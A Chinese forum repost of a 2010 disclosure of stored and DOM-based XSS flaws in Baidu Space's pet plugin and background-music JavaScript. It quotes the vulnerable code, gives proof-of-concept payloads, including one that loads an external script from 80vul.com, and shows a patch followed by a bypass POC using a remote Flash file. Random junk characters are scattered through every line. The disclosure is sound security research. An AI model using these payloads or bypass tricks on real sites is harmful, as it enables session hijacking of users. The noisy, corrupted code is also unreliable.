百度空间的宠物插件对用户输入变量未经任何过滤便存储,并不经过滤输出,造成XSS. * E# }+ g6 C. u" f) B4 N0 ~ T
' H" M3 \+ l/ L+ j* }1.在http://hi.baidu.com/p__z/modify/sppet中,用户可以输入留言管理,提交后,未过滤直接储存. & y/ B" N- H! ^; x: E1 U" u) i
2.在http://hi.baidu.com/ui/scripts/pet/pet.js中 ( |7 D1 v9 u5 C# H
9 @2 U: g5 o$ M: H. s3 w. K: j( [: N0 ]将输出一段HTML:<p style="margin-top:5px"><strong>’+F[2]+"说:</strong>"+BdUtil.insertWBR(F[0], 4)+’</p>
$ A3 }( a; \& X其中BdUtil.insertWBR为
0 U$ L2 u& o5 P: }function(text, step) {
9 a2 j! S' D/ R/ q. x: `4 q var textarea = textAreaCache || getContainer(); ( f" F/ S5 [8 u: P- |4 q& A7 E$ F
if (!textarea) { : X3 ~- t+ t3 A
return text; 6 Z- ^4 _/ F; a
} 2 c% Y5 O. E7 Q* H# {, D
textarea.innerHTML = text.replace(/&/g, "&").replace(/</g, "<").replace(/>/g, ">");
" @8 e1 f, L" u8 m% G var string = textarea.value;
' R7 y0 ^, S: j) L( O; A var step = step || 5, reg = new RegExp("(\\S{" + step + "})", "gi");
, S# I% Z2 k4 F3 u2 E7 } var result = string.replace(/(<[^>]+>)/gi, "$1<wbr/>").replace(/(>|^)([^<]+)(<|$)/gi, function (a, b, c, d) {if (c.length < step) {return a;}return b + c.replace(reg, "$1<wbr/>") + d;}).replace(/&([^;]*)(<wbr\/?>)([^;]*);/g, "&$1$3;");
9 E1 N8 E, M1 f6 ?: | return result;
" o! y$ t- ?$ \8 w} ; X+ B6 v$ q* U" B( F' K: ]
在首页中,textAreaCache 和 getContainer()均不存在,故!textarea为true,未经过滤直接return text.造成XSS. ( }+ K, u' H5 c/ x1 K
测试代码:宠物留言管理处输入:<img src=# onerror=alert(/qing/)>
7 A+ z+ V6 j$ ]' W
4 S# |/ i7 o5 Y z: J二:creatbgmusic() Dom-Xss Bug 8 I* x) D. ^5 H
百度空间的Javascript Dom函数creatbgmusic()在输出变量bgmusic*没有进行过滤,导致可以通过initBlogTextForFCK()函数构造容易HTML代码,最终导致xss漏洞
" j* r2 K. e! B' V( z" m$ x. j
3 O% r' U& E( _9 |: F4 m在http://hi.baidu.com//js/bgmusic.js?v=1.0.js 代码: & O0 Z9 E- i- C' H% C# o* r
+ O h) l1 X# k& s( O" |/ Qfunction creatbgmusic(murl, musicnum, IsMusicHide, IsMusicLoop, IsMusicAutoPlay, unknow, functype) {
* d% X9 v. P) `/ V$ Z6 U //传入的murl赋值到bgmusic1和bgmusic2中
1 V! Z/ y2 |/ x5 t6 P6 m- n+ T //可以通过构造类似代码来闭合标签如 "><img src=2 onerror=s=document.createElement("script");s.src="http://www.80vul.com/sobb/alert.php";document.body.appendChild(s);>#1
$ W/ i: F2 I. j& L var bgmusic1 = "<OBJECT id=phx width=100% classid=clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6 " + (IsMusicHide ? "height=45" : "") + ">" + "<PARAM NAME=\"URL\" VALUE=\"" + murl + "?t=" + Math.random() + "\">" + " <PARAM NAME=\"rate\" VALUE=\"1\">" + " <PARAM NAME=\"balance\" VALUE=\"0\">" + " <PARAM NAME=\"currentPosition\" VALUE=\"0\">" + " <PARAM NAME=\"defaultFrame\" VALUE=\"\">" + " <PARAM NAME=\"PlayCount\" VALUE=\"" + (IsMusicLoop ? 100 : 0) + "\">" + " <PARAM NAME=\"DisplayMode\" VALUE=\"0\">" + " <PARAM NAME=\"PreviewMode\" VALUE=\"0\">" + " <PARAM NAME=\"DisplayForeColor\" VALUE=\"16777215\">" + " <PARAM NAME=\"ShowCaptioning\" VALUE=\"0\">" + " <PARAM NAME=\"ShowControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowAudioControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowDisplay\" VALUE=\"0\">" + " <PARAM NAME=\"ShowGotoBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowStatusBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowTracker\" VALUE=\"1\">" + " <PARAM NAME=\"autoStart\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"AutoRewind\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"currentMarker\" VALUE=\"0\">" + " <PARAM NAME=\"invokeURLs\" VALUE=\"0\">" + " <PARAM NAME=\"baseURL\" VALUE=\"\">" + " <PARAM NAME=\"volume\" VALUE=\"100\">" + " <PARAM NAME=\"mute\" VALUE=\"0\">" + " <PARAM NAME=\"stretchToFit\" VALUE=\"0\">" + " <PARAM NAME=\"windowlessVideo\" VALUE=\"1\">" + " <PARAM NAME=\"enabled\" VALUE=\"1\">" + " <PARAM NAME=\"EnableFullScreenControls\" VALUE=\"0\">" + " <PARAM NAME=\"EnableTracker\" VALUE=\"1\">" + " <PARAM NAME=\"EnablePositionControls\" VALUE=\"1\">" + " <PARAM NAME=\"enableContextMenu\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionStart\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionEnd\" VALUE=\"0\">" + " <PARAM NAME=\"fullScreen\" VALUE=\"0\">" + " <PARAM NAME=\"SAMIStyle\" VALUE=\"\">" + " <PARAM NAME=\"SAMILang\" VALUE=\"\">" + " <PARAM NAME=\"SAMIFilename\" VALUE=\"\">" + " <PARAM NAME=\"captioningID\" VALUE=\"\">" + " <PARAM NAME=\"Visualizations\" VALUE=\"1\">";
; O6 T5 h3 K, |# Z. Z: p0 H: R if (musicnum <= 1) {
5 }6 F x1 t0 V bgmusic1 += " <PARAM NAME=\"uiMode\" VALUE=\"mini\">";
" `7 u: X, h' A9 B' T$ Q* b6 M0 _- ~ }
) A2 L" J% I2 F# [ bgmusic1 += "</OBJECT>";
2 f" ] M) `* d. U: ` var bgmusic2 = "<EMBED src=\"" + murl + "?t=" + Math.random() + "\" width=\"100%\" " + (IsMusicHide ? "height=45" : "") + " type=\"application/x-mplayer2\" invokeurls=\"0\" autogotourl=\"false\" autostart=" + (IsMusicAutoPlay ? 1 : 0) + " loop=" + (IsMusicLoop ? 1 : 0) + " quality=\"high\""; 5 m! P1 s% @' t' _
if (musicnum <= 1) { 8 M( _& v. I3 A/ w" h0 C
bgmusic2 += "showcontrols=\"1\" showpositioncontrols=\"0\" ";
; n. M& i; `0 f# {' v5 P1 R. L) | } ) t; E9 V& f4 O
bgmusic2 += "> </EMBED>"; 4 p c8 L( i. t4 d g; }8 Z
var bgmusic3 = "<div id=\"m_bgmusic\" class=\"modbox\">\u5BF9\u4E0D\u8D77\uFF0C\u60A8\u5C1A\u672A\u5B89\u88C5windows media player\uFF0C\u65E0\u6CD5\u6B23\u8D4F\u8BE5\u7A7A\u95F4\u7684\u80CC\u666F\u97F3\u4E50\uFF0C\u8BF7\u5148<a href=\"http://www.baidu.com/s?wd=windows+media+player+%CF%C2%D4%D8&cl=3\" target=\"_blank\">\u4E0B\u8F7D\u5E76\u5B89\u88C5</a><br><br></div>";
; ?, r* v0 m0 _9 M+ R9 T- n5 L var bgmus = detectWMP(); + K9 W! a% s' r
if (functype == "FckMusicHelper") { 0 c" U& i& c: m) f8 a0 I/ l
if (bgmus.installed) {
' b4 T9 M9 u! S2 c2 |, t* h1 l if (bgmus.type == "IE") {
1 F& |/ j+ I* [ T% |5 W a" u return bgmusic1; & Y+ l* s8 O. W. F
} else if (bgmus.type == "NS") { ! ^0 U7 q0 X' r
return bgmusic2;
U0 Y. k- @+ ?/ A& O }
3 r i0 K9 s$ W } else { 7 l! f3 Y* Y0 a
return bgmusic3; 4 R/ D. g0 S; N q* |4 |2 F: E2 B
} - k( R% K: I8 F7 t
} else {
8 L, a7 s( [0 u, @& c( _ if (bgmus.installed) {
9 \: b9 Y/ Y; J+ Z& _ //document.write 直接输出bgmusic变量 导致xss
/ h' P7 ?* o: c if (bgmus.type == "IE") { & j8 w! ~6 n1 z% {2 c
document.write(bgmusic1);
2 N7 T6 r7 a+ U. X9 g } else if (bgmus.type == "NS") {
, E) `: l) T5 q document.write(bgmusic2); # o, x5 |/ V Z0 n! r
} : F; |8 T# I) N [7 z
} else {
# }# E' K' L: v document.write(bgmusic3);
6 _, |5 T6 z- W. \3 k9 I } 9 m; ^9 Z8 r/ ^" _
return "";
/ K4 u* b: w& c2 K( l5 @7 T+ M } 6 B$ K8 V8 ^" m4 d# e
}
2 t1 `5 d i7 h5 `6 ]% J) G* \" @+ o3 F$ e' q" J/ w0 {& F
在看百度空间里的initBlogTextForFCK()函数,调用了creatbgmusic() ,代码如下:
( N8 e; d. @" [% h( L2 C. Y& b' k4 o) [/ v7 r
function initBlogTextForFCK(){
# O: U6 p" N) v: [7 y//fck init music 1 I/ w9 U5 {1 @4 Z! Y4 ]- Q7 l0 \
if(window.Node){Node.prototype.replaceNode=function(Node){this.parentNode.replaceChild(Node,this);}} % r2 i2 `. E. C
var imgBox=document.getElementsByName(’musicName’); //取得了文章中的所有name="musicName"的标签数组
" d, f( S- }1 e0 E% x* |( r3 Z. Uvar isAutoPlay=true;
* S) @: f! B6 w) b' h) Kfor(var i=0,n=imgBox.length;i<n;i++){ //然后遍历. # k, H, J! _$ K8 p# M0 e5 B/ V: |
var img=imgBox; 9 b1 G' s, h& m6 m6 ~3 n v
if(img.getAttribute(’rel’)){ $ K9 U* X9 F3 F* b$ K: ~
var musicSrc=img.getAttribute(’rel’); //取得标签中rel的值,赋值给musicSrc & h2 [+ T# C6 B' b9 W& B* y
var musicDiv = document.createElement("SPAN");
% S% U% i; n9 C8 G1 F8 ^ var tmp=musicSrc.substr (musicSrc.indexOf(’#’)+1, 1); //以"#"为界分割musicSrc字符串,提取自动播放的flag[tmp]
/ u8 z( @, c) M5 _ & k3 z1 a$ I! n$ e; p; Q+ ~
..........................
$ k# T- _; @1 o3 V/ i
$ j- f5 u0 X7 j. X' x6 N4 b+ i //直接将部分musicSrc传入creatbgmusic函数.在creatbgmusic函数直接把传入的murl赋值到bgmusic1和bgmusic2中并document.write出来.
5 c( Z7 o3 R7 a var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’); ! z2 ]3 T6 t& P: k8 v: A$ f
shtml=shtml.replace(’width=100%’,’width=200’).replace(’width="100%"’,’width=200 height=45’); img.replaceNode(musicDiv); ' q3 T# J# y A$ n4 l9 @ {& d
musicDiv.innerHTML=shtml;
% J! F; c9 k7 J( x* | i--;n--; & z4 G6 M/ a+ k& A2 |$ B
} - k4 k0 z: k7 e- e; t! j7 Y
} % U- v& q$ w1 H0 x
, G% @; `& G0 |( E" y9 R; q从上面的代码分析可以看出:在所有的参数传递中,我们没有看到过滤.百度空间的富文本编辑器的过滤模式是基于HTML语法的,不会过滤掉一个属性的值中的HTML标签.所以我们可以精心构造一个的恶意的标签,在JS进行DOM操作后引起XSS. - z) I0 a* L- y- o+ B! a
) u% I8 Z3 A3 Y# _. c0 G测试方法:<img width="200" height="45" name="musicName" rel=’"><img src=2 onerror=alert(/qing/)>#1’ src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif"/> * u, Z6 k+ p, ?" g; e
/ B* K/ B! ]3 O4 i) I! n" ^; d等待官方补丁 - X, S. S( V4 E- ^3 R/ a6 `
6 x: h2 n; _2 v. s4 y
update 2010年5月13日
! Q1 j G6 t, ?; O, `" V6 r. Q- I
! v; y+ b% u( g8 p+ o官方补丁:
* a- e( _8 O, y/ k- C
6 s0 v6 p: S+ p* D1 xvar shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’); 6 A( b3 I B% ~* [) P6 v
改为:
0 z! r8 \8 {5 l0 S q6 {; fvar shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)).replace(/[\s><()]+/g,’’),1,true,false,isAutoPlay,isAutoPlay,’FckMusicHelper’);
0 m1 s3 W0 b/ R3 V$ g8 h4 ^. J$ Q
update 2010年5月13日 21:50:37 ( t8 F4 f# V! U
) {; {: _6 C0 z8 i补丁存在漏洞 没有过滤" 可以继续跨: ' N# h6 ]& {5 A6 r
% g8 S" e4 ^) a& ANEW POC:
. ?, d. M2 e1 w& [8 h1 ^' B" w7 r% Q3 u
<img width="200" height="45" _fcksavedurl=" http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" rel=’http://www.xsser.net/pz/js.swf"
# ]3 `7 M" R- i" ]! x- J5 t5 h7 a' j4 L5 d0 h
allowscriptaccess="always" type="application/x-shockwave-flash"#2’ name="musicName"/>8 a; E: a( }+ ?$ Q3 ]
& p# ~3 R ~0 b
|
发表于 2013-8-24 11:51:11
收藏
支持
反对